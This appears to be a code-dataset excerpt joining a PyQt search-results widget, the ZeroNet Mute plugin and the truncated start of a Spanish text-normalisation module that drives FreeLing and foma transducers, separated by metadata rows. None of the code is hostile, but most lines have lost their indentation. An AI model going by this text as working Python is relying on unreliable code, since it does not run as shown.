self.contracts_found = list_of_contracts
self.setObjectName(_fromUtf8("search_results_widget"))
self.resize(748, 568)
self.verticalLayoutWidget = QtGui.QWidget(self)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(-1, -1, 751, 571))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.search_results_label = QtGui.QLabel(self.verticalLayoutWidget)
self.search_query_label = QtGui.QLabel(self.verticalLayoutWidget)
header_font = QtGui.QFont()
header_font.setFamily(_fromUtf8("Latin Modern Sans"))
header_font.setPointSize(36)
self.search_query_label.setFont(header_font)
header_font.setUnderline(True)
self.search_results_label.setFont(header_font)
self.search_results_label.setObjectName(_fromUtf8("search_results_label"))
self.verticalLayout.addWidget(self.search_results_label)
self.verticalLayout.addWidget(self.search_query_label)
self.results_list = QtGui.QListWidget(self.verticalLayoutWidget)
self.results_list.setObjectName(_fromUtf8("results_list"))
##
# Add all search results to the list
#
item_font = QtGui.QFont()
item_font.setPointSize(16)
for contract in self.contracts_found:
item = QtGui.QListWidgetItem()
item.setFont(item_font)
item.setText(contract.get_itemname())
item.setData(QtCore.Qt.UserRole, contract)
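            # the contract object itself is stashed in the item's UserRole
            # slot; result_clicked() below recovers it via toPyObject()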
self.results_list.addItem(item)
self.results_list.itemClicked.connect(self.result_clicked)
self.verticalLayout.addWidget(self.results_list)
self.setWindowTitle(_translate("search_results_widget", "Search Results", None))
self.search_results_label.setText(_translate("search_results_widget", "Search Results", None))
self.search_query_label.setText(_translate("search_results_widget", "Queried: " + search, None))
self.results_list.setSortingEnabled(False)
##
# Defines action to be taken on item result click.
def result_clicked(self, list_item):
##
# Try to get contract data from item
try:
ric_repr = list_item.data(QtCore.Qt.UserRole).toPyObject()
        except Exception:
            print 'Could not retrieve contract data from the selected item'
return
scroll_area = QtGui.QScrollArea()
scroll_area.setWidget(contractView_Tab(ric_repr))
self.window().add_tab(scroll_area, ric_repr.get_itemname())
| mit | 6,554,279,241,628,381,000 | 52.918382 | 362 | 0.674003 | false | 3.690438 | false | false | false |
frerepoulet/ZeroNet | plugins/Mute/MutePlugin.py | 2 | 3864 | import time
import json
import os
import re
from Plugin import PluginManager
from Translate import Translate
from Config import config
from util import helper
if os.path.isfile("%s/mutes.json" % config.data_dir):
try:
mutes = json.load(open("%s/mutes.json" % config.data_dir))["mutes"]
except Exception, err:
mutes = {}
else:
open("%s/mutes.json" % config.data_dir, "w").write('{"mutes": {}}')
mutes = {}
if "_" not in locals():
_ = Translate("plugins/Mute/languages/")
@PluginManager.registerTo("UiWebsocket")
class UiWebsocketPlugin(object):
    # Search for a user's files and remove or re-add them
def changeDb(self, auth_address, action):
self.log.debug("Mute action %s on user %s" % (action, auth_address))
res = self.site.content_manager.contents.db.execute(
"SELECT * FROM content LEFT JOIN site USING (site_id) WHERE inner_path LIKE :inner_path",
{"inner_path": "%%/%s/%%" % auth_address}
)
for row in res:
site = self.server.sites.get(row["address"])
if not site:
continue
dir_inner_path = helper.getDirname(row["inner_path"])
for file_name in site.storage.walk(dir_inner_path):
if action == "remove":
site.storage.onUpdated(dir_inner_path + file_name, False)
else:
site.storage.onUpdated(dir_inner_path + file_name)
site.onFileDone(dir_inner_path + file_name)
def cbMuteAdd(self, to, auth_address, cert_user_id, reason):
mutes[auth_address] = {"cert_user_id": cert_user_id, "reason": reason, "source": self.site.address, "date_added": time.time()}
self.saveMutes()
self.changeDb(auth_address, "remove")
self.response(to, "ok")
def actionMuteAdd(self, to, auth_address, cert_user_id, reason):
if "ADMIN" in self.getPermissions(to):
self.cbMuteAdd(to, auth_address, cert_user_id, reason)
else:
self.cmd(
"confirm",
[_["Hide all content from <b>%s</b>?"] % cert_user_id, _["Mute"]],
lambda (res): self.cbMuteAdd(to, auth_address, cert_user_id, reason)
)
def cbMuteRemove(self, to, auth_address):
del mutes[auth_address]
self.saveMutes()
self.changeDb(auth_address, "load")
self.response(to, "ok")
def actionMuteRemove(self, to, auth_address):
if "ADMIN" in self.getPermissions(to):
self.cbMuteRemove(to, auth_address)
else:
self.cmd(
"confirm",
[_["Unmute <b>%s</b>?"] % mutes[auth_address]["cert_user_id"], _["Unmute"]],
lambda (res): self.cbMuteRemove(to, auth_address)
)
def actionMuteList(self, to):
if "ADMIN" in self.getPermissions(to):
self.response(to, mutes)
else:
return self.response(to, {"error": "Only ADMIN sites can list mutes"})
def saveMutes(self):
helper.atomicWrite("%s/mutes.json" % config.data_dir, json.dumps({"mutes": mutes}, indent=2, sort_keys=True))
@PluginManager.registerTo("SiteStorage")
class SiteStoragePlugin(object):
def updateDbFile(self, inner_path, file=None, cur=None):
if file is not False: # File deletion always allowed
            # Look for bitcoin addresses in the file path
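            # e.g. a hypothetical inner_path such as
            # "data/users/1HeLLoWoRLdAbCdEfGhIjKlMnOpQrS/content.json"
            # would yield that address as a match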
matches = re.findall("/(1[A-Za-z0-9]{26,35})/", inner_path)
            # Check if any of the addresses are in the mute list
for auth_address in matches:
if auth_address in mutes:
self.log.debug("Mute match: %s, ignoring %s" % (auth_address, inner_path))
return False
return super(SiteStoragePlugin, self).updateDbFile(inner_path, file=file, cur=cur)
| gpl-2.0 | 2,080,761,283,754,991,900 | 37.64 | 134 | 0.587992 | false | 3.551471 | true | false | false |
jacerong/normalesp | normalesp/spell_checking.py | 1 | 55817 | # -*- coding: iso-8859-15 -*-
"""This is the main program of the Python project.
To use this program, please check the document "/docs/usage.rst".
"""
import difflib, multiprocessing, os, re, socket, subprocess, threading,\
xml.etree.ElementTree as ET
import kenlm, numpy as np, psutil, py_common_subseq
from sklearn.grid_search import ParameterGrid
from unidecode import unidecode
from timeout import Timeout
CURRENT_PATH = os.path.dirname(os.path.abspath(__file__))
###############################
# read the configuration file #
###############################
config = ET.parse(CURRENT_PATH + '/config/general.xml').getroot()
FREELING_PORT = config[0][0].text
FOMA_PATH = config[1][0].text.rstrip('/')
IP_ADDRESS = config[1][1].text
SYSTEM_USER = config[2][0].text
NUM_WORKERS = '%i' % (2 * int(config[2][1].text) + 1)
config = None
##########################
# other config variables #
##########################
TRANSDUCERS_PATH = CURRENT_PATH + '/datasets/transducers/bin'
TRANSDUCERS = {
'es-dicc':
[TRANSDUCERS_PATH + '/es-dicc.bin', IP_ADDRESS, '60962'],
'pnd-gazetteer':
[TRANSDUCERS_PATH + '/PND-Gazetteer.bin', IP_ADDRESS, '60963'],
'primary_variants':
[TRANSDUCERS_PATH + '/primary_variants.bin', IP_ADDRESS, '60964'],
'dictionary_lookup':
[TRANSDUCERS_PATH + '/dictionary_lookup.bin', IP_ADDRESS, '60965'],
'secondary_variants-dicc':
[TRANSDUCERS_PATH + '/secondary_variants-Dicc.bin', IP_ADDRESS, '60966'],
'es-verbal-forms-fonemas':
[TRANSDUCERS_PATH + '/es-verbal-forms-fonemas.bin', IP_ADDRESS, '60967'],
'es-diminutives-fonemas':
[TRANSDUCERS_PATH + '/es-diminutives-fonemas.bin', IP_ADDRESS, '60968'],
'pnd-gazetteer-fonemas':
[TRANSDUCERS_PATH + '/PND-gazetteer-fonemas.bin', IP_ADDRESS, '60969'],
'tertiary_variants-dicc':
[TRANSDUCERS_PATH + '/tertiary_variants-Dicc.bin', IP_ADDRESS, '60970'],
'tertiary_variants-pnd':
[TRANSDUCERS_PATH + '/tertiary_variants-PND.bin', IP_ADDRESS, '60971'],
'pnd-gazetteer-case':
[TRANSDUCERS_PATH + '/PND-gazetteer-CaSe.bin', IP_ADDRESS, '60972'],
'iv-candidates-fonemas':
[TRANSDUCERS_PATH + '/IV-candidates-fonemas.bin', IP_ADDRESS, '60973'],
'split-words':
[TRANSDUCERS_PATH + '/split-words.bin', IP_ADDRESS, '60974'],
'length_normalisation':
[TRANSDUCERS_PATH + '/length_normalisation.bin', IP_ADDRESS, '60982'],
'length_normalisation-2':
[TRANSDUCERS_PATH + '/length_normalisation-2.bin', IP_ADDRESS, '60983'],
'phonology':
[TRANSDUCERS_PATH + '/phonology.bin', IP_ADDRESS, '60984'],
'other-changes':
[TRANSDUCERS_PATH + '/other-changes.bin', IP_ADDRESS, '60985'],
'remove_enclitic':
[TRANSDUCERS_PATH + '/remove_enclitic.bin', IP_ADDRESS, '61002'],
'accentuate_enclitic':
[TRANSDUCERS_PATH + '/accentuate_enclitic.bin', IP_ADDRESS, '61003'],
'remove_mente':
[TRANSDUCERS_PATH + '/remove_mente.bin', IP_ADDRESS, '61004']}
CORPORA = {
'eswiki-corpus-3-grams':
CURRENT_PATH + '/datasets/eswiki/corpora/eswiki-corpus-3-grams.bin'}
####################
# global variables #
####################
ALPHABET = re.compile(u'''[a-z\xe1\xe9\xed\xf3\xfa\xfc\xf1]''', re.I|re.U)
VOWELS_RE = re.compile(u'''[aeiou\xe1\xe9\xed\xf3\xfa\xfc]''', re.I|re.U)
ACCENTED_VOWELS_RE = re.compile(u'''[\xe1\xe9\xed\xf3\xfa]''', re.I|re.U)
ONE_LETTER_WORDS = [u'a', u'e', u'o', u'u', u'y']
TWO_LETTER_WORDS = [u'ah', u'al', u'ay',
u'da', u'de', 'dé'.decode('utf-8'), u'di', 'dí'.decode('utf-8'),
u'eh', u'el', 'él'.decode('utf-8'), u'en', u'es', u'ex',
u'fe',
u'ha', u'he',
u'id', u'ir',
u'ja', u'je', u'ji', u'jo', u'ju',
u'la', u'le', u'lo',
u'me', u'mi', 'mí'.decode('utf-8'),
u'ni', u'no',
u'oh', 'oí'.decode('utf-8'), u'ok', u'os',
u'se', 'sé'.decode('utf-8'), u'si', 'sí'.decode('utf-8'), u'su',
u'te', 'té'.decode('utf-8'), u'ti', u'tu', 'tú'.decode('utf-8'),
u'uf', u'uh', u'un', u'uy',
u'va', u've', 'vé'.decode('utf-8'), u'vi',
u'ya', u'yo']
LOCK = threading.Lock()
def _to_unicode(token):
return token.decode('utf-8') if not isinstance(token, unicode) else token
def _to_str(token):
return token.encode('utf-8') if not isinstance(token, str) else token
def _write_in_file(fname, content, mode='w', makedirs_recursive=True):
dir_ = '/'.join(fname.split('/')[:-1])
if not os.path.isdir(dir_) and makedirs_recursive:
os.makedirs(dir_)
with open(fname, mode) as f:
f.write(content)
def _deaccent(word):
    '''Remove the accent marks from the word.'''
word = _to_unicode(word)
remove_accents = {
u'\xe1': u'a',
u'\xe9': u'e',
u'\xed': u'i',
u'\xf3': u'o',
u'\xfa': u'u',
u'\xfc': u'u'}
return _to_unicode(''.join([
remove_accents[s] if s in remove_accents.keys() else s
for s in word]))
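# Usage sketch for _deaccent (illustrative values, not from the original code):
#     _deaccent(u'canci\xf3n')   # -> u'cancion'
#     _deaccent(u'ping\xfcino')  # -> u'pinguino'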
def _normalize_unknown_symbols(token):
"""Símbolos (letras) no reconocidos los decodifica a ASCII."""
return ''.join([
s if ALPHABET.match(s) else _to_unicode(unidecode(s))
for s in _to_unicode(token)])
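# For instance, a letter outside the Spanish alphabet such as u'\xeb' would be
# transliterated by unidecode, so that, hypothetically,
# _normalize_unknown_symbols(u'po\xebta') would return u'poeta'.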
def _switch_freeling_server(
mode='on', initialization_command='default', port=FREELING_PORT,
workers=NUM_WORKERS):
    '''Start/stop the FreeLing analysis service.
    params:
        initialization_command: str | list
            specifies the FreeLing configuration. By default, it is the one
            provided by the TweetNorm 2013 workshop.
            NOTE: this parameter is added to allow FreeLing to be initialised
            from other files.
        port: int
            which port will be used to run the FreeLing service.
    NOTE: the process is started and stopped as the SYSTEM_USER user.
    '''
pid = None
for process in psutil.process_iter():
cmd_line = process.cmdline()
if (process.username() == SYSTEM_USER and len(cmd_line) > 1
and re.search('analyzer$', cmd_line[0], re.I)
and (cmd_line[-4] == port)):
pid = process.pid
break
if pid is not None and mode == 'off':
psutil.Process(pid=pid).kill()
elif pid is None and mode == 'on':
if (isinstance(initialization_command, str)
and initialization_command == 'default'):
subprocess.Popen(['analyze', '-f', CURRENT_PATH + '/config/es.cfg',
'--flush', '--ftok', CURRENT_PATH + '/config/es-twit-tok.dat',
'--usr', '--fmap', CURRENT_PATH + '/config/es-twit-map.dat',
'--outlv', 'morfo', '--noprob', '--noloc',
'--server', '--port', port, '--workers', workers, '&'])
elif (isinstance(initialization_command, list)
and len(initialization_command) > 0):
subprocess.Popen(initialization_command)
else:
        raise Exception('No valid initialization command was specified')
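# A minimal usage sketch (assuming FreeLing and its "analyze"/"analyzer"
# binaries are installed and the configuration files referenced above exist):
#     _switch_freeling_server(mode='on')   # start the default TweetNorm server
#     ...                                  # issue analysis requests
#     _switch_freeling_server(mode='off')  # stop it again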
def _analyze_morphologically(text, port=FREELING_PORT):
    '''Morphologically analyse the text of a tweet.
    This method is used to identify out-of-vocabulary words.
    NOTE: the FreeLing configuration used to analyse the tweet is the one
    provided by the organisers of the TweetNorm 2013 workshop.
    The analysis is performed through the service exposed by FreeLing.
    '''
text = _to_str(text)
fname = CURRENT_PATH + '/.tmp/FreeLing-%03d%s%05d' %(
np.random.randint(0, 100),
'-' if np.random.randint(0,2) == 1 else '',
np.random.randint(0, 100000))
_write_in_file(fname + '.txt', text)
subprocess.call(["analyzer_client", port],
stdin=open(fname + '.txt'),
stdout=open(fname + '.morpho', 'w'))
sentences = []
sentence = []
with open(fname + '.morpho') as foutput:
for line in foutput:
line = line.rstrip('\n')
if len(line) == 0:
sentences.append(sentence)
sentence = []
continue
try:
form, lemma, tag = re.split('\s+', line)[:3]
sentence.append([
form.decode('utf-8'), lemma.decode('utf-8'),
tag.decode('utf-8')])
except:
form = line
sentence.append([form.decode('utf-8'), '', ''])
os.remove(fname + '.txt')
os.remove(fname + '.morpho')
return sentences
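# The returned structure is a list of sentences, each one a list of
# [form, lemma, tag] triples; e.g. (hypothetical output):
#     [[[u'hola', u'hola', u'I'], [u'mundo', u'mundo', u'NCMS000']]]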
def _check_flookup_server_status(transducer):
"""Evalúa si el transductor está ejecutándose como servicio.
paráms:
transducer: str
Nombre del transductor. Puede ser la ruta completa
o parte de esta.
Retorna el pid del proceso de flookup que ejecuta como servidor
el transductor.
NOTA: los procesos deben haber sido ejecutados por el usuario SYSTEM_USER.
"""
pid = None
transducer = _to_str(transducer)
for process in psutil.process_iter():
cmd_line = process.cmdline()
if (process.username() == SYSTEM_USER and len(cmd_line) > 1
and re.search('flookup$', cmd_line[0], re.I)
and re.search(transducer + '.bin', _to_str(cmd_line[-2]), re.I)):
pid = process.pid
break
return pid
def _switch_flookup_server(
transducer='all', mode='on', set_of_transducers=TRANSDUCERS):
"""Iniciar o terminar un servicio de transductor como servidor.
paráms:
transducer: str
nombre del transductor definido como clave en el diccionario
set_of_transducers.
Por defecto se asumen todos los transductores.
mode: str
toma dos posibles valores: ON, para iniciar el servidor;
OFF, para terminar el servidor.
set_of_transducers: dict
conjunto de transductores
NOTA: este parámetro se agrega para permitir la ejecución
de transductores que no se especifican en este fichero.
NOTA: los procesos deben ser ejecutados por el usuario SYSTEM_USER.
"""
transducer = _to_str(transducer).lower()
if transducer != 'all' and transducer not in set_of_transducers.keys():
        raise Exception('Transducer %s not recognised' % transducer)
elif mode not in ['on', 'off']:
        raise Exception('The specified action is not valid')
if transducer == 'all':
pool = multiprocessing.Pool(processes=3)
for t in set_of_transducers.keys():
pool.apply_async(
_switch_flookup_server,
[t, mode, set_of_transducers])
pool.close()
pool.join()
return
pid = _check_flookup_server_status(transducer)
transducer = set_of_transducers[transducer]
if mode == 'on':
if pid is None:
subprocess.Popen([FOMA_PATH + '/flookup', '-S',
'-A', transducer[1], '-P', transducer[2],
'-i', '-x', transducer[0], '&'])
else:
if pid is not None:
process = psutil.Process(pid=pid)
process.kill()
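# Usage sketch (assumes the foma binaries listed in TRANSDUCERS exist):
#     _switch_flookup_server('es-dicc', mode='on')  # start a single transducer
#     _switch_flookup_server(mode='off')            # stop all of them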
def _foma_string_lookup(token, transducer, set_of_transducers=TRANSDUCERS):
    '''Analyse the token through the specified transducer.
    params:
        token: str
            character string to be analysed.
        transducer: str
            transducer that will analyse the token. It can be a full path
            or one of the keys specified in set_of_transducers.
        set_of_transducers: dict
            set of transducers
    NOTE: if the transducer is not a physical path on the system, but one of
    the keys of the set_of_transducers dictionary, the token will be analysed
    through a flookup service. For this, the flookup service must have been
    started beforehand.
    '''
use_server = False
if transducer.lower() in set_of_transducers.keys():
use_server = True
elif not os.path.isfile(transducer):
        raise Exception('The specified transducer does not exist')
token = _to_str(token)
result = []
if not use_server:
fname_input = '%s-%03d%s%05d.txt' % (
CURRENT_PATH + '/.tmp/flookup',
np.random.randint(0, 100),
'-' if np.random.randint(0,2) == 1 else '_',
np.random.randint(0, 100000))
_write_in_file(fname_input, token, mode='w')
fname_output = fname_input.replace('.txt', '.out')
subprocess.call([FOMA_PATH + '/flookup', '-i', '-x', transducer],
stdin=open(fname_input),
stdout=open(fname_output, 'w'))
with open(fname_output) as finput:
for line in finput:
line = line.rstrip('\n')
if len(line.strip()) > 0 and line != '?+':
result.append(_to_unicode(line))
os.remove(fname_input)
os.remove(fname_output)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
transducer = set_of_transducers[transducer.lower()]
sock.sendto(token, (transducer[1], int(transducer[2])))
data, addr = sock.recvfrom(4096)
result = [_to_unicode(d)
for d in data.split('\n')
if len(d.strip()) > 0 and d != '?+']
sock.close()
return result
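# Usage sketch (assumes the 'es-dicc' flookup service was started beforehand):
#     _foma_string_lookup('casa', 'es-dicc')
# returns [u'casa'] if the dictionary recognises the word, or an empty list
# otherwise (the '?+' marker emitted by flookup is filtered out).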
def _transducers_cascade(token, transducers, set_of_transducers=TRANSDUCERS):
"""Ejecuta una cascada de transductores en foma.
Si bien la cascada puede implementarse directamente sobre foma,
este método se desarrolla porque puede ser más económico ejecu-
tar secuncialmente.
paráms:
token: str o array de str
"""
if isinstance(token, list):
tokens = token
concatenated_result = []
for token in tokens:
concatenated_result += _transducers_cascade(
token, transducers, set_of_transducers)
return concatenated_result
result = []
for i, transducer in enumerate(transducers):
tokens = []
iter_result = []
if i == 0:
tokens.append(token)
else:
tokens = result[i - 1]
iter_result = [t2
for t1 in tokens
for t2 in _foma_string_lookup(t1, transducer, set_of_transducers)
if len(t2.strip()) > 0 and t2 != '?+']
result.append(np.unique(iter_result).tolist())
return result[i]
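# Usage sketch, mirroring the cascade applied to verbal forms further below
# (assumes the corresponding flookup services are running):
#     _transducers_cascade(u'vamos',
#         ['length_normalisation-2', 'phonology', 'es-verbal-forms-fonemas'])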
def _recover_original_word_case_from_type(word, case_type):
"""Recupera las minús./mayús de la palabra según el tipo identificado."""
word = _to_unicode(word).lower()
if case_type == 0:
return word
elif case_type == 1:
return word[0].upper() + word[1:]
else:
return word.upper()
def _get_case_type_in_token(token):
"""Retorna cómo está formada la palabra según mayúsculas/minúsculas.
El valor (entero) retornado es uno de los siguientes:
0 -> palabra completamente en minúscula.
1 -> palabra con la primera letra en mayúscula.
2 -> palabra principalmente (o totalmente) formada por mayúsculas.
"""
token = _to_unicode(token)
case_type = 2
if token.lower() == token:
case_type = 0
elif len(token) > 1 and (token[0].upper() + token[1:].lower()) == token:
case_type = 1
return case_type
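# For example: _get_case_type_in_token(u'hola') -> 0,
# _get_case_type_in_token(u'Hola') -> 1, and both u'HOLA' and u'hOLA' -> 2.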
def _select_non_fused_words(candidates):
"""Seleccciona el menor número de palabras.
El separador de palabras es el caracter "_".
Es decir, se selecciona el menor número de "_" insertados.
NOTA: si la palabra termina en una letra, se descarta. O
si hay una palabra igual que "ll", también se dercarta.
También, se aceptan candidatas con una palabra más, al mínimo establecido,
si y solo si, esta nueva palabra es de longitud uno.
"""
final_candidates = []
final_candidates_aux = []
idx = np.array([len(c.split('_')) for c in candidates], dtype=int)
lengths = []
for i in np.where(idx <= (idx.min() + 1))[0]:
words = candidates[i].split('_')
words_length = []
ill_formed_word = False
for j, word in enumerate(words):
word = _to_unicode(word)
words_length.append(len(word))
if (word == u'll'
or (j == (len(words) - 1) and len(word) < 2)
or (len(word) == 2 and word not in TWO_LETTER_WORDS)
or (j == 0 and word in [u'e', u'o', u'u'])
or (word == 'e' and words[j+1].lower()[0] != u'i')
or (word == 'o' and words[j+1].lower()[0] == u'o')
or (word == 'u' and words[j+1].lower()[0] != u'o')
or (not VOWELS_RE.search(word) and word != u'y')):
ill_formed_word = True
break
if not ill_formed_word and len(words) == idx.min():
lengths.append(words_length)
final_candidates.append(candidates[i])
elif not ill_formed_word:
final_candidates_aux.append(candidates[i])
for candidate in final_candidates_aux:
words_length = [len(_to_unicode(w)) for w in candidate.split('_')]
ill_formed_word = []
for length in lengths:
j = 0
for l in length:
if l != words_length[j]:
if ((words_length[j]==1 or words_length[j+1]==1)
and (words_length[j]+words_length[j+1])==l):
ill_formed_word.append(0)
else:
ill_formed_word.append(1)
break
j += 1
if (len(ill_formed_word) == len(lengths)
and sum(ill_formed_word) < len(lengths)):
final_candidates.append(candidate)
return final_candidates
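# Illustrative sketch (hypothetical candidates): given
# [u'mi_casa', u'mi_ca_sa'], the function keeps [u'mi_casa'], i.e. the
# candidate with the fewest inserted "_" whose words all pass the
# well-formedness checks above.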
def _find_longest_common_substring(string_1, string_2):
"""Encuentra el más largo substring entre dos cadenas.
También devuelve el ratio: longitud del LCSubstring
dividido el string de mayor longitud entre string_1
y string_2.
"""
string_1 = _deaccent(_to_unicode(string_1).lower())
string_2 = _deaccent(_to_unicode(string_2).lower())
max_length = len(string_1)
if len(string_2) > max_length:
max_length = len(string_2)
seq_matcher = difflib.SequenceMatcher(None, string_1, string_2)
longest_match = seq_matcher.find_longest_match(0, len(string_1),
0, len(string_2))
longest_match_str = None
longest_match_ratio = .0
if longest_match.size != 0:
longest_match_str = string_1[longest_match.a:
longest_match.a + longest_match.size]
longest_match_ratio = len(longest_match_str) / float(max_length)
return longest_match_str, longest_match_ratio, longest_match.a, longest_match.b
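# Worked example: _find_longest_common_substring(u'vamos', u'vamosnos')
# returns (u'vamos', 0.625, 0, 0): the match u'vamos' has length 5 and the
# longer string has length 8, hence the ratio 5/8.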
def _compute_longest_common_subsequence_ratio(
oov_word, iv_word, recursion=False, normalise_lengthening=True):
"""Calcula el radio de LCS entre dos palabras dadas.
El radio de LCS se calcula sobre el string de mayor
longitud entre oov-word e iv-word.
[REF] Lexical Normalisation of Short Text Messages: Makn Sens a #twitter
NOTA: se remueven acentos para no afectar el cómputo de LCSR.
"""
if not recursion:
oov_word = _deaccent(_to_unicode(oov_word).lower())
iv_word = _deaccent(_to_unicode(iv_word).lower())
try:
with Timeout(2):
oov_words = _foma_string_lookup(oov_word, 'other-changes')
except Timeout.Timeout:
oov_words = [oov_word]
_switch_flookup_server('other-changes', mode='on')
LCSR_values = np.zeros(len(oov_words), dtype=float)
for i, string in enumerate(oov_words):
LCSR_values[i] = _compute_longest_common_subsequence_ratio(
string, iv_word, recursion=True,
normalise_lengthening=normalise_lengthening)
return LCSR_values.max()
oov_word = _deaccent(_to_unicode(oov_word).lower())
iv_word = _deaccent(_to_unicode(iv_word).lower())
normalised_variants = [oov_word]
if normalise_lengthening:
normalised_variants = _foma_string_lookup(
oov_word, 'length_normalisation-2')
LCSR = 0.
    # normalisation to one or two repetitions at most
for normalised_f in normalised_variants:
normalised_f = _to_unicode(normalised_f)
max_length = np.max(
np.array([len(normalised_f), len(iv_word)], dtype=float))
common_subseq = py_common_subseq.find_common_subsequences(
normalised_f, iv_word)
for subseq in common_subseq:
ratio = len(subseq) / max_length
LCSR = ratio if ratio > LCSR else LCSR
return LCSR
def _filter_target_words_by_length(target_words):
"""Filtra candidatas de acuerdo a su longitud.
Exactamente, si la candidata empieza en minúscula, es decir,
es recuperada del diccionario de español, y su longitud es
menor que tres, ésta debe estar en el listado de palabras
de longitud uno o dos aceptadas.
"""
target_words_ = []
for target in target_words:
target = _to_unicode(target)
if len(target) in [1, 2] and target[0] == target[0].lower():
if len(target) == 1 and target in ONE_LETTER_WORDS:
target_words_.append(target)
elif target in TWO_LETTER_WORDS:
target_words_.append(target)
else:
target_words_.append(target)
return target_words_
def _filter_target_words_based_on_LCSR(oov_word, target_words, LCSR):
"""Filtra target words cuyo LCSR está por debajo del umbral requerido."""
remove_idx = []
for i, target in enumerate(target_words):
ratio = _compute_longest_common_subsequence_ratio(
oov_word, target)
if ratio < LCSR:
remove_idx.append(i)
else:
for i in reversed(remove_idx):
target_words.pop(i)
return target_words
def _check_affixes(word, normalised_variants, affix=None, what_affix=None):
'''Extrae prefijos y sufijos comunes.
paráms:
word: str
palabra no normalizada (en cuanto a repetición de caracteres).
normalised_variants: array (de elementos de tipo str)
variantes normalizadas a uno o dos repeticiones como máximo de
caracteres.
affix: str
tipo de búsqueda a realizar.
'suffix' (para sufijo) o 'prefix' (para prefijo)
what_affix: str
se especifica cuál búsqueda realizar de acuerdo al tipo.
'''
if affix is None:
searches = [
['suffix', 'enclitic'],
['suffix', 'mente'],
['suffix', 'diminutives']]
target_words = []
for affix, what_affix in searches:
target_words += _check_affixes(word, normalised_variants,
affix, what_affix)
return np.unique(target_words).tolist()
target_words = []
if affix == 'suffix' and what_affix == 'enclitic':
# identificar cuáles variantes corresponden a una forma
# verbal (candidata) removiendo hipotéticos enclíticos
final_verbal_form = [
'', # forma verbal
.0, # Longest Common Substring ratio
'', # enclítico
False, # si la s de forma verbal fue suprimida (vamos+nos -> vámonos)
]
for verbal_form in _foma_string_lookup(word, 'remove_enclitic'):
if verbal_form not in normalised_variants:
# comparar la forma verbal (candidata) con las variantes
# normalizadas, para así determinar con cuál es más simi-
# lar y cuál el enclítico removido
for normalised_f in normalised_variants:
longest_match = _find_longest_common_substring(
verbal_form, normalised_f)
if (longest_match[1] == .0 or
longest_match[2] != 0 or longest_match[3] != 0):
continue
enclitic = normalised_f[len(longest_match[0]):]
if longest_match[1] > final_verbal_form[1]:
final_verbal_form = [longest_match[0],
longest_match[1], enclitic,
False]
if final_verbal_form[1] != .0:
# realizar la conversión grafema/fonema de la forma verbal
if final_verbal_form[0].endswith('mo'):
final_verbal_form[0] = final_verbal_form[0] + u's'
final_verbal_form[3] = True
verbal_forms_from_fonema = _transducers_cascade(final_verbal_form[0],
['length_normalisation-2',
'phonology',
'es-verbal-forms-fonemas'])
for verbal_form in verbal_forms_from_fonema:
_verbal_form = verbal_form
if final_verbal_form[3]:
verbal_form = verbal_form[:-1]
verbal_form = verbal_form + final_verbal_form[2]
accentuated_forms = np.unique(_foma_string_lookup(verbal_form,
'accentuate_enclitic')).tolist()
# depurar: si hay dos o más tildes en la palabra -> descartar
remove_idx = []
non_accented_form = u''
for i, accentuated_form in enumerate(accentuated_forms):
accented_vowels = ACCENTED_VOWELS_RE.findall(accentuated_form)
if len(accented_vowels) == 1:
target_words.append(accentuated_form)
elif len(accented_vowels) > 1:
remove_idx.append(i)
else:
non_accented_form = accentuated_form
for i in reversed(remove_idx):
accentuated_forms.pop(i)
if (len(target_words) == 0 and not final_verbal_form[3] and
(re.search(u'''[\xe1\xe9\xf3]i''', _verbal_form, re.U)
or re.search(u'''\xed[aeo]''', _verbal_form, re.U))):
target_words.append(_verbal_form + final_verbal_form[2])
else:
target_words.append(verbal_form)
target_words.append(non_accented_form)
elif affix == 'suffix' and what_affix == 'mente':
# realizar búsqueda del sufijo -mente en la palabra,
# e identificar posibles adjetivos
adjectives = []
for adjective in _foma_string_lookup(word, 'remove_mente'):
if adjective not in normalised_variants:
adjectives += _foma_string_lookup(
adjective, 'secondary_variants-dicc')
if len(adjectives) != 0:
longest_match_ratios = np.zeros((len(adjectives), 2))
for i, adjective in enumerate(adjectives):
for normalised_f in normalised_variants:
if not re.search(u'(?:mente)$', normalised_f, re.U):
continue
normalised_f = re.sub(u'(?:mente)$', '',
normalised_f, flags=re.U)
LCSR = _compute_longest_common_subsequence_ratio(
normalised_f, adjective,
recursion=False, normalise_lengthening=False)
if LCSR > longest_match_ratios[i,0]:
longest_match_ratios[i,0] = LCSR
longest_match_ratios[i,1] =\
_find_longest_common_substring(normalised_f, adjective)[1]
idx_i = np.where(
longest_match_ratios[:,0] == longest_match_ratios[:,0].max())[0]
idx_j = np.where(
longest_match_ratios[:,1] == longest_match_ratios[:,1].max())[0]
intersect = np.intersect1d(idx_i, idx_j)
if len(idx_i) == 1 or len(intersect) == 0:
target_words.append(adjectives[idx_i[0]] + u'mente')
else:
target_words.append(adjectives[intersect[0]] + u'mente')
elif affix == 'suffix' and what_affix == 'diminutives':
diminutives = []
for normalised_f in normalised_variants:
normalised_f = _deaccent(normalised_f)
diminutives.append([normalised_f, None])
if normalised_f.endswith(u'z'):
normalised_f = normalised_f[:-1] + u's'
changes = []
if normalised_f.endswith(u's'):
normalised_f = normalised_f[:-1]
diminutives.append([normalised_f, u's'])
changes.append(u's')
elif normalised_f.endswith(u'tin'):
diminutives.append([normalised_f[:-2] + u'o', u'in'])
if re.search(r'i(?:ll|y)[ao]$', normalised_f, re.U):
normalised_f = re.sub(r'i(?:ll|y)([ao])$', r'it\1',
normalised_f, flags=re.U)
changes.append(u'll')
diminutives.append([normalised_f, u'+'.join(changes)])
if normalised_f.endswith(u'a'):
diminutives.append([normalised_f[:-1] + u'o',
u'+'.join(changes + [u'a'])])
elif normalised_f.endswith(u'o'):
diminutives.append([normalised_f[:-1] + u'a',
u'+'.join(changes + [u'o'])])
# realizar transcripción fonética y recuperar diminutivos
diminutive_candidates = diminutives
diminutives = []
for candidate, changes in diminutive_candidates:
real_words = _transducers_cascade(candidate,
['phonology', 'es-diminutives-fonemas'])
for result in real_words:
if changes is None:
diminutives.append(result)
continue
elif changes == u'in':
diminutives.append(result[:-1] + 'ín'.decode('utf-8'))
continue
for change in reversed(changes.split(u'+')):
if change == u's':
result = result + u's'
elif change == u'll':
